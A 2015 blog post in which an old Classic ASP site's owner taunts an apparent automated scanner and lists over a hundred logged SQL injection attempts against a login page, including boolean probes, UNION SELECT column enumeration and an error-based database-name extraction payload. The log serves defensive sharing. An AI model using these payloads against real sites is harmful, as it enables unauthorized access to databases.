by   March 26 2015   
When you need to test your SQL Injection prevention scripts it's always nice finding someone online that has all the newest and oldest lines in the book. You can't bet log reports unless you get in and actually delete them. I appreciate the effort Mr. TVDW.EU did. I didn't check to see if it was an open proxy, but I hope it was. You should cut down on the scan attempts. I typically ignore those under 20. I look at those over 100 but I write about those that scan over 7,000 times.

So how did I do ? Did I pass your test?

SQL Injection vulnerabilities

I thought I would share some Classic ASP Injection Code tests. 

But after reviewing over 7,000 injection attempts I thought it might be better to help you design a better tester. 

I know you're just so into your VB that you had to test your new Injector on my oldest running ASP site. It's 19 years this year so SQL injection isn't something new. Just the players are new. 

Here's your information so you know that I know and to make sure you understand I log, log and log. Then I really do actually read the logs. 

5.79.68.161 is from Netherlands (NL) in region Western Europe
Input: 5.79.68.161
canonical name: tor-exit.server6.tvdw.eu
Registered Domain: tvdw.eu

Dear Mr. TVDW.EU, You're such a NOOB so my first tip to you on scanning for SQL Injection is to not scan the same folder twice. 

Example: 

/folder/file.asp?querystring:66%27%20or%201%3Dconvert%28int%2C%28select%20cast%28Char%28114%29%2bChar%2851%29%2bChar%28100%29%2bChar%28109%29%2bChar%2848%29%2bChar%28118%29%2bChar%2851%29%2bChar%2895%29%2bChar%28104%29%2bChar%28118%29%2bChar%28106%29%2bChar%2895%29%2"
/folder/file2.asp?querystring:66%27%20or%201%3Dconvert%28int%2Cchr%28114%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28109%29%7C%7Cchr%2848%29%7C%7Cchr%28118%29%7C%7Cchr%2851%29%7C%7Cchr%2895%29%7C%7Cchr%28104%29%7C%7Cchr%28118%29%7C%7Cchr%28106%29%7C%7Cchr%2895%29"

The odds unless you're talking about really old sloppy programmers, the odds of finding a different connection link from different files within the same folder is very slim. 

Now you did good on my login page. 

It's important to know if you're working with a GET or a POST. 
If you would have scanned before hand you would have known. 

Most of the attempts were from my internal redirect link which might have confused your script. You might need to look at your scraping code to get it down, seems you scrapped some no-follow links which is important because they just don't give you enough. 

  1. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996"
  2. MyLoginPage.ASP?pgrt:999999.9"
  3. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20and%201%3D1"
  4. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20and%201%3E1"
  5. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%27%20and%20%27x%27%3D%27x"
  6. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%27%20and%20%27x%27%3D%27y"
  7. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%22%20and%20%22x%22%3D%22x"
  8. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%22%20and%20%22x%22%3D%22y"
  9. MyLoginPage.ASP?pgrt:9999%20and%201%3D1"
  10. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%27"
  11. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536--"
  12. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536--"
  13. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--"
  14. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--"
  15. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--"
  16. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--"
  17. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--"
  18. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--"
  19. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  20. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  21. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  22. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  23. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  24. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  25. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  26. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  27. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  28. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  29. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  30. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  31. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  32. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  33. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  34. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  35. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  36. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  37. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  38. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  39. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  40. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  41. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  42. MyLoginPage.ASP?pgrt:999999.9%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x3130"
  43. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null--"
  44. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull--"
  45. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull--"
  46. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull--"
  47. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull--"
  48. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  49. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  50. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  51. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  52. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  53. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  54. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  55. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  56. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  57. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  58. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  59. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  60. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  61. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  62. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  63. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  64. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  65. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  66. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  67.  
  68. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cn"
  69. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cn"
  70. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cn"
  71. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cn"
  72. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cn"
  73. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cn"
  74. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cn"
  75. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cn"
  76. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null--"
  77. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull--"
  78. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull--"
  79. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull--"
  80. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull--"
  81. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  82. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  83. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  84. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  85. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  86. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  87. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  88. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  89. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  90. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  91. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  92. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  93. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  94. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  95. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  96. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  97. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  98. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  99. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--"
  100. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cn"
  101. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cn"
  102. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cn"
  103. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cn"
  104. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cn"
  105. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cn"
  106. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cn"
  107. arg=/mnworksnet_jobs/accounting.asp?Value%27"
  108. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20union%20all%20select%20null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cn"
  109. MyLoginPage.ASP?pgrt:folder%2Fdetails.asp%3Fsid%3D1996%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29%29%20from%20"
